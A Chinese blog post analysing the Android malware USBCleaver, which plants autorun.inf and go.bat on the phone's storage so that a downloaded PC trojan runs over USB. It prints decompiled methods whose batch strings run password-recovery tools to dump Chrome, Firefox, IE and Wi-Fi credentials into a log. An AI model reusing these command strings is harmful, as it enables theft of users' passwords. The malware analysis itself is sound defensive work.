本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/9179749
作者:Jack_Jia 邮箱:309zhijun@163.com
一、病毒样本基本信息
Md5:283d16309a5a35a13f8fa4c5e1ae01b1
Package:com.novaspirit.usbcleaver
二、病毒代码分析
1、查看AndroidMainfest.xml文件
由清单文件可以看出,该恶意软件的入口点只有一个.USBCleaverActivity。
2、代码分析流程
代码树结构如下:
经过对程序唯一入口点的分析,恶意代码工作流程如下:
1、点击程序图标后运行USBCleaverActivity组件,该组件主要负责病毒运行环境的创建,如病毒所需目录结构。通过payloadHander完成autorun.inf文件写入(当以USB设备连接PC时,PC根据该文件配置运行go.bat),通过downloader完成对PC木马的下载。
2、downloader类负责PC木马压缩包的下载,下载后通过decompress完成PC木马压缩包解压
下载的PC木马压缩包信息如下:
3、payload通过payloadHandler产生go.bat,go.bat文件在autorun.info中配置运行。
public String dumpChromePassword()
{
this.dumpChromePassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump Chrome PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\ChromePass.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpChromePassword;
}
public String dumpFFPassword()
{
this.dumpFFPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\nEcho + [Dump Firefox PW] + >> %log% 2>&1\r\nEcho +----------------------------------+ >> %log% 2>&1\r\n%progdir%\\PasswordFox.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpFFPassword;
}
public String dumpIEPassword()
{
this.dumpIEPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump IE PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\iepv.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpIEPassword;
}
public String dumpSysInfo()
{
this.dumpSysInfo = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [System info] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nIPCONFIG /all >> %log% 2>&1\r\n\r\n";
return this.dumpSysInfo;
}
public String dumpWifiPassword()
{
this.dumpWifiPassword = "ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\nECHO + [Dump WIFI PW] + >> %log% 2>&1\r\nECHO +----------------------------------+ >> %log% 2>&1\r\n.\\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1\r\nCOPY %log%+%tmplog%* %log% >> NUL\r\nDEL /f /q %tmplog% >NUL\r\n\r\n";
return this.dumpWifiPassword;
}
go.bat文件内容就是执行下载PC木马的执行。到此PC平台木马的运行环境搭建完毕。当手持设备以USB模式连接PC后,PC木马即可成功运行。
三、病毒运行模型及恶意行为
Usbcleaver病毒运行时从服务器下载PC木马压缩包,并解压到SD卡,创建autorun.info和go.bat文件搭建PC木马运行环境。当手持设备以USB设备模式连接电脑后,下载的PC木马能够立即执行。
下载的PC木马能够窃取以下隐私信息:
1、Default gateway
2、DNS
3、Google Chrome password
4、Host name
5、IP address
6、Microsoft Internet Explorer password
7、Mozilla Firefox password
8、Physical address
9、Subnet mask
10、WiFi password
目前短信认证码已经大量运用于电子商务和网银类网站。即使用户通过PC木马窃取了您网站的用户名和密码。但是涉及交易时需要输入动态的短信认证码,PC木马试图侵入到您的手机从而获取短信认证码的难度是相当大的。交易通道和认证信息的“独立双通道”是网上交易安全大大增强。然后如果木马通过感染移动设备,今儿感染用户的PC设备。这样木马就完全控制了用户的交易通道和认证通道,整个交易流程完即刻被木马攻破。
http://www.symantec.com/security_response/writeup.jsp?docid=2013-062010-1818-99
http://news.ccidnet.com/art/1032/20130625/5029495_1.html
分享到:
相关推荐
Android待机流程分析---锁屏、解锁模块源码分析+流程分析图
android-support-v4-v7-v13-v14-v17(官方最新完整版),官方最新版的,压缩包内包含android-support-v4、android-support-v7-appcompat,android-support-v7-cardview,android-support-v7-gridlayout,android-support-...
最新android studio 2015/10/12日更新 2015/10/12 android-studio-bundle-141.2288178-windows
android核心分析,介绍了android的一些特性,共二十几个介绍点,网上word文件转化为pdf,便于阅读 Android核心分析(01)----讨之设计意图 Android核心分析(02)----方法论探讨之概念空间篇 Android核心分析(03)-...
Android实验报告。在Android下java开发一个扫雷游戏 资源里有报告和源码 此源码为网上开源资源,请慎重使用。 报告也为应付考试之用,如您对报告和源码要求较高,请勿下载! 如果您是为应付考试之用,请下载后适当...
Android自定义控件---联系人列表A-Z排序 此demo的博客地址:http://blog.csdn.net/u012814441
为了解决这些问题,故而开发了此款软件,该软件不仅解决了上述问题,而且还支持对日志文件进行离线分析和导出备份,支持对日志内容的横向过滤和纵向过滤,且可通过ADB工具直连物理设备进行日志的监控和分析,无需...
将android-18解压到Android\android-sdk\platforms下。
将android-17.zip解压到 Android\android-sdk\platforms 文件夹下。
Android中滑屏初探 ---- scrollTo 以及 scrollBy方法使用说明 Android中滑屏初探 ---- scrollTo 以及 scrollBy方法使用说明 Android中滑屏初探 ---- scrollTo 以及 scrollBy方法使用说明
Android图形系统分析-surfaceFlinger流程.欢迎研究surface 人员下载学习
ksoap2-android-assembly-2.6.5-jar-with-dependencies.jar 要是需要最新的,下载地址: http://code.google.com/p/ksoap2-android/
[14本经典Android开发教程]-6-Android驱动开发入门及手机案例开发分析教程 http://download.csdn.net/detail/cleopard/8388019 剩余8本稍后上传!@或直接从这里寻找@ http://download.csdn.net/user/cleopard/album...
[14本经典Android开发教程]-11-Android...[14本经典Android开发教程]-6-Android驱动开发入门及手机案例开发分析教程 http://download.csdn.net/detail/cleopard/8388019 ....... 剩余3本稍后上传!@或直接从这里寻找@ ...
1. Android编译系统分析 2. 文件系统分析 3. 制作交叉工具链 4. 软件编译常识 5. 设置模块流程分析 6. linux系统启动流程分析 7. linux下svn使用指南 8. LFS 相关 9. linux 内核的初步理解 ------------------------...
Android自定义锁屏实现----仿正点闹钟滑屏解锁
android sdk 3.1 android-sdk_r11-windows 只是个tool,sdk还要自己下载 手机开发平台 Google Android SDK 3.1 R11 Android eclipse插件安装: https://dl-ssl.google.com/Android/eclipse/ Android netBean插件安装:...
android-support-v4.jar android-support-v7-appcompat.jar v7-cardview.jar v7-gridlayout.jar v7-mediarouter.jar v7-palette.jar v7-recyclerview.jar android-support-v13.jar android-support-v17-...
基于Android手机app开发与设计--毕业设计--开题分析报告.pdf基于Android手机app开发与设计--毕业设计--开题分析报告.pdf基于Android手机app开发与设计--毕业设计--开题分析报告.pdf基于Android手机app开发与设计--...
http://s1.eoeandroid.com/sdk/4.1/android-sdk_r20-windows.zip(推荐) http://s1.eoeandroid.com/sdk/4.1/installer_r20-windows.exe Mac版: http://s1.eoeandroid.com/sdk/4.1/android-sdk_r20-macosx.zip ...